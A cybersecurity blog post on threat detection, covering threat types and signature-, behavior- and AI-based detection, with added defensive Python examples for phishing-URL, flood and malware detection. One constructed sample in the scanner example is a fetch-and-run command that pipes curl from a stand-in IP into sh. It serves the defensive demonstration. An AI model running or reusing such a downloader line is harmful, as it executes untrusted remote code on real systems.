What is threat detection?

Threats of all kinds put our cybersecurity in danger. Learn about common threat types and how to detect them.

April 12, 2024 by Hannah Hamilton


Threat actors are constantly endangering our cybersecurity by using all kinds of methods and tools. Identifying these threats is difficult and requires strong threat detection capabilities. In this blog, we’ll talk about threat detection: what it is, what threats we’re detecting and how they’re detected.

First, let’s define what we mean by a threat. The U.S. National Institute of Standards and Technology (NIST) defines a cyber threat as:

Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service. Also, the potential for a threat-source to successfully exploit a particular information system vulnerability.

In other words, a threat is anything that could compromise your or your organization's data or operations. So what is threat detection? Threat detection analyzes what is happening on your systems (files, processes, network traffic, user activity) to identify threats before they do damage, or at least before they do more of it. This is different from a similar-sounding term, threat prevention, which aims to block threats from entering your system in the first place. In practice the two work together, since prevention is never complete.

Let’s talk about some common threat types.


Types of threats

Malware

Malware, or malicious software, is used by attackers to steal your data, damage your system, take control of your device or serve some other malicious purpose. Malware can get onto your device through:

  • Downloads from the internet
  • Email attachments that you open
  • Attackers exploiting vulnerabilities in the operating system or installed software
  • Clicking on malicious links

Once malware is on your device or servers, attackers can use it as a foothold. One common outcome is ransomware, a type of malware that encrypts your data and/or copies it out of your environment, then demands payment to restore access or to keep the data private. Attackers can also use stolen usernames and passwords to move deeper into your company's network until they find what they're looking for.

Social engineering

Social engineering attacks exploit human nature, whether it's kindness (an attacker posing as someone in need), trust (posing as a colleague or a known vendor) or fear (threatening that something bad will happen unless you act now). This type of attack is extremely common, and is often used to steal your information or get malware onto your computer.

Phishing is a type of social engineering and a major threat to data security. It's often easier for an attacker to trick a user into handing over credentials or installing malware than to break in technically, because phishing requires far less technical know-how. Phishing could look like:

  • An email mimicking your bank that asks you to reset your password. Clicking the link directs you to a look-alike site where attackers record the username and password you type in.
  • A text message saying your package cannot be delivered and that you must click a link to fix the problem. The link sends you to a malicious website.
  • You manage your company's finances and receive an email with an attached invoice from a sender pretending to be a contractor. You open the attachment, which installs malware on your device.
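To make the "look-alike site" idea concrete, here is an added example (not code from the original post or from any Jamf product) of a heuristic URL check: it flags hostnames that imitate a trusted domain through a homoglyph swap, a small typo, a top-level domain swap, or by burying the brand name in a subdomain of an unrelated domain. The trusted-domain list, the URLs and the edit-distance threshold are all constructed assumptions for the demonstration.

```python
# Added example, not code from the original post: a heuristic that flags
# look-alike phishing hostnames against a short list of domains the
# organization trusts. All domains and URLs below are constructed.
from urllib.parse import urlsplit

# Hypothetical allowlist of legitimate domains (assumption for the example).
TRUSTED_DOMAINS = ("examplebank.com", "example-courier.com")

# Character swaps attackers use to build names that look right at a glance.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize(label: str) -> str:
    """Fold common look-alike characters back to the letters they imitate."""
    label = label.lower()
    for fake, real in HOMOGLYPHS:
        label = label.replace(fake, real)
    return label


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert/delete/substitute), classic DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def registrable_domain(host: str) -> str:
    """Last two labels of the hostname. Caveat: a real implementation must use
    the Public Suffix List so that names like 'bank.co.uk' are split correctly."""
    parts = host.split(".")
    return ".".join(parts[-2:])


def classify_url(url: str) -> str:
    """Return 'trusted', 'lookalike of <domain>', 'unknown' or 'invalid'."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    if not host or "." not in host:
        return "invalid"
    domain = registrable_domain(host)
    if domain in TRUSTED_DOMAINS:
        return "trusted"
    second_level = normalize(domain.split(".")[0])
    for trusted in TRUSTED_DOMAINS:
        brand = normalize(trusted.split(".")[0])
        # 1. Trusted name buried in a subdomain: examplebank.com.secure-login.net
        if trusted in host:
            return f"lookalike of {trusted}"
        # 2. Brand embedded in the registrable label: examplebank-login.com
        # 3. TLD swap, typo or homoglyph edit: examplebank.net, examp1ebank.com
        if brand in second_level or edit_distance(second_level, brand) <= 2:
            return f"lookalike of {trusted}"
    return "unknown"


if __name__ == "__main__":
    for sample in ("https://www.examplebank.com/login",
                   "https://examp1ebank.com/reset-password",
                   "https://examplebank.com.secure-login.net/",
                   "https://example-courier.co/track?id=1",
                   "https://unrelated.org/"):
        print(f"{sample:48} -> {classify_url(sample)}")
```

Two caveats a practitioner would want: the registrable-domain split is naive (production code uses the Public Suffix List), and an edit-distance threshold of 2 produces false positives for short brand names, so real products combine checks like these with URL reputation feeds rather than relying on string similarity alone.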

Misconfigurations and vulnerabilities

Sometimes the problem isn't something an attacker sends you; it's a weakness in your own environment. Strictly speaking these are vulnerabilities rather than threats (a threat is what exploits them), but they belong on the list because they are what turns an attempted attack into a successful one. This could be:

  • Out-of-date software or operating systems
  • Software with known or unknown vulnerabilities that attackers can exploit
  • Weak password policies
  • Access policies that are too lax; not using least-privilege access principles

Denial of service

A denial of service (DoS) attack is used to prevent a device or service from functioning properly. For example, in a distributed denial of service (DDoS) attack, an attacker uses a large number of compromised devices to flood a website with requests at the same time. When the website can't handle the traffic, the server behind it becomes unresponsive or crashes, and legitimate users can no longer reach it. This can wreak havoc on a company's operations, especially if the website is a significant source of revenue.
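The flood described above is visible in the web server's own access logs. The following is an added example, not code from the original post or from any Jamf product, of a sliding-window detector that distinguishes a single noisy source from a distributed flood in which no individual source looks abnormal. The log lines, the IP addresses and the thresholds are constructed assumptions.

```python
# Added example, not code from the original post: a sliding-window detector
# that flags request floods in web server access logs. The log lines are
# constructed for the demonstration; thresholds are illustrative assumptions.
import re
from collections import defaultdict, deque, namedtuple
from datetime import datetime, timedelta, timezone

Event = namedtuple("Event", "ts ip path")

# Apache/nginx "combined"-style line: ip - - [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" \d{3} \S+$')

BASE = datetime(2024, 4, 12, 10, 0, 0, tzinfo=timezone.utc)


def make_line(ip: str, ts: datetime, path: str = "/") -> str:
    """Build one access log line (constructed data)."""
    return f'{ip} - - [{ts.strftime("%d/%b/%Y:%H:%M:%S %z")}] "GET {path} HTTP/1.1" 200 512'


def build_sample_log() -> list:
    lines = []
    # Three ordinary visitors spread over a minute.
    for i, ip in enumerate(("192.0.2.11", "192.0.2.12", "192.0.2.13")):
        lines.append(make_line(ip, BASE + timedelta(seconds=30 * i), "/products"))
    # One noisy source: 80 requests in 10 seconds (plain DoS from a single host).
    for n in range(80):
        lines.append(make_line("203.0.113.10", BASE + timedelta(seconds=20 + n // 8)))
    # A botnet: 50 sources, only 5 requests each, all inside 5 seconds (DDoS).
    for bot in range(1, 51):
        for n in range(5):
            lines.append(make_line(f"198.51.100.{bot}", BASE + timedelta(seconds=40 + n)))
    return lines


def parse(lines):
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash the detector
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield Event(ts, m["ip"], m["path"])


def detect_floods(lines, window=timedelta(seconds=10), per_source=50, aggregate=200):
    """Return (sources exceeding the per-source limit, timestamps at which total
    traffic inside one window first exceeded the aggregate limit)."""
    events = sorted(parse(lines), key=lambda e: e.ts)
    per_ip = defaultdict(deque)   # recent timestamps per source
    recent = deque()              # recent timestamps across all sources
    noisy_sources = set()
    flood_starts = []
    for ev in events:
        q = per_ip[ev.ip]
        q.append(ev.ts)
        while q[0] < ev.ts - window:
            q.popleft()
        if len(q) > per_source:
            noisy_sources.add(ev.ip)
        recent.append(ev.ts)
        while recent[0] < ev.ts - window:
            recent.popleft()
        # A distributed flood: each bot stays under per_source, the sum does not.
        if len(recent) > aggregate and (not flood_starts or ev.ts - flood_starts[-1] > window):
            flood_starts.append(ev.ts)
    return sorted(noisy_sources), flood_starts


if __name__ == "__main__":
    sources, floods = detect_floods(build_sample_log())
    print("per-source offenders:", sources)
    print("aggregate flood windows starting at:", [t.isoformat() for t in floods])
```

The per-source rule alone would miss the botnet entirely, which is the whole point of distributing an attack; the aggregate rule catches it but cannot say which sources to block. In practice the thresholds come from a baseline of normal traffic rather than fixed numbers, and mitigation of a large flood has to happen upstream of the server, since by the time the server is logging the requests it is already spending resources on them.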

Insider threats

Insider threats come from someone who already has legitimate access to or knowledge of your systems and does something that undermines your security. This may be unintentional, like an employee falling for a phishing attack, or intentional, like a disgruntled employee using their inside knowledge and access to steal information.

Unknown

There are many threats out there, including new ones that Security teams haven't seen yet, such as malware with no known signature or an attack on a vulnerability that hasn't been disclosed. These are difficult to find and require detection that doesn't depend solely on a list of what's already known.

Threat detection methods

Detecting these threats is not a simple task. Organizations deal with threats constantly, and it only takes one successful attack to cause significant damage. That's why it's critical to have the right tools in your defense strategy. Here are some of the methods used to spot attacks:

Signature-based detection

Signature-based detection recognizes known components of a threat by referencing a database of known threat signatures: file hashes, byte sequences, domain names and so on. For example, your threat detection software scans your device for code that is known to be part of malware. If it finds this code, your software knows that you have malware on your device. The strength of this method is precision: a signature match is rarely a false alarm. Its weakness is that it can only catch what is already in the database, so new malware, or old malware modified just enough to change its hash, slips past.

Behavior-based detection

Behavior-based detection doesn't look for specific code like signature-based detection does. Instead, it looks for behavior that indicates malware might be on your device. For example, an infected device might consume far more CPU or disk than usual, encrypt large numbers of files in a short time or connect to a network location it has never talked to before. Because it judges actions rather than code, this method can catch threats that have no signature yet; the trade-off is that unusual but legitimate activity can trigger false positives, so the rules need tuning against what is normal for your environment.
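To show the difference between the two approaches just described, here is an added example (not code from the original post or from any Jamf product) that pairs a small signature-based file scanner with a behavior-based rule set run over constructed process telemetry. The EICAR string is the industry-standard antivirus test pattern; the other samples, the signature names, the rule thresholds and the telemetry records are all hypothetical.

```python
# Added example, not code from the original post: a toy file scanner with a
# signature database (hashes plus byte patterns) and a behavior-based
# detector run over constructed process telemetry. The EICAR string is the
# industry-standard antivirus test pattern; every other sample, signature
# name, threshold and telemetry record is hypothetical.
import hashlib
import ipaddress

# --- Signature-based: look for a known artifact of a known threat.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
KNOWN_DOWNLOADER = b"#!/bin/sh\ncurl -s http://198.51.100.7/stage2 | sh\n"  # constructed sample

HASH_SIGNATURES = {  # sha256 -> name; the hash of a sample "captured earlier"
    hashlib.sha256(KNOWN_DOWNLOADER).hexdigest(): "Demo.Downloader.B",
}
BYTE_SIGNATURES = {  # name -> byte sequence that appears inside the malware
    "EICAR-Test-File": EICAR,
    "Demo.Dropper.A": b"INSTALL_PAYLOAD_v2",  # hypothetical marker string
}


def scan_file(data: bytes) -> list:
    """Exact-hash match first, then byte-pattern search. Returns signature names."""
    hits = []
    name = HASH_SIGNATURES.get(hashlib.sha256(data).hexdigest())
    if name:
        hits.append(name)
    for name, pattern in BYTE_SIGNATURES.items():
        if pattern in data:
            hits.append(name)
    return hits


# --- Behavior-based: we do not know the code, only what a threat tends to do.
OFFICE_APPS = {"Microsoft Word", "Microsoft Excel", "Preview"}
SHELLS = {"sh", "bash", "zsh", "osascript"}


def _is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def assess_process(rec: dict) -> list:
    """Apply behavior rules to one telemetry record; returns triggered rule names."""
    findings = []
    if rec["parent"] in OFFICE_APPS and rec["name"] in SHELLS:
        findings.append("office-app-spawned-shell")        # an invoice that runs a shell
    dest = rec.get("dest")
    if dest and (_is_ip_literal(dest[0]) or dest[1] not in (80, 443)):
        findings.append("unexpected-network-destination")  # raw IP or unusual port
    if rec["cpu"] > 90:
        findings.append("sustained-high-cpu")              # "uses more resources"
    if rec["files_written"] > 100:
        findings.append("mass-file-modification")          # ransomware-like burst
    return findings


# Constructed endpoint telemetry, one record per observed process.
TELEMETRY = [
    {"pid": 101, "name": "Safari", "parent": "launchd", "cpu": 4.0,
     "dest": ("cdn.example.com", 443), "files_written": 2},
    {"pid": 202, "name": "Microsoft Word", "parent": "launchd", "cpu": 2.0,
     "dest": None, "files_written": 1},
    {"pid": 203, "name": "sh", "parent": "Microsoft Word", "cpu": 1.0,
     "dest": ("198.51.100.7", 8080), "files_written": 0},
    {"pid": 303, "name": "photo_helper", "parent": "launchd", "cpu": 97.0,
     "dest": None, "files_written": 450},
]


def assess_all(records=TELEMETRY) -> dict:
    """pid -> triggered rules, only for processes with at least one finding."""
    report = {}
    for rec in records:
        findings = assess_process(rec)
        if findings:
            report[rec["pid"]] = findings
    return report


if __name__ == "__main__":
    print(scan_file(KNOWN_DOWNLOADER))            # hash hit
    print(scan_file(KNOWN_DOWNLOADER + b"\n"))    # one extra byte defeats the hash
    print(scan_file(b"junk" + EICAR + b"junk"))   # byte pattern still hits
    print(assess_all())
```

The second `scan_file` call is the limitation from the previous section in miniature: appending a single newline changes the hash and the known downloader is no longer recognized, while the process that it spawns (a shell under Microsoft Word, calling out to a raw IP on port 8080) is still caught by the behavior rules. The behavior rules carry the opposite risk: a legitimate backup or photo-export tool also writes hundreds of files and pegs the CPU, which is why thresholds like these are tuned per environment rather than fixed.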

Artificial intelligence and machine learning

Artificial intelligence (AI) and machine learning (ML) are used to enhance these detection capabilities. Models trained on large volumes of known-good and known-bad activity can flag threats that aren't in any signature database and behaviors that no hand-written rule anticipated, at a scale and speed no human analyst could match. They are a powerful complement to Security researchers rather than a replacement: a model's output still needs analyst review, and it is only as good as the data it was trained on.
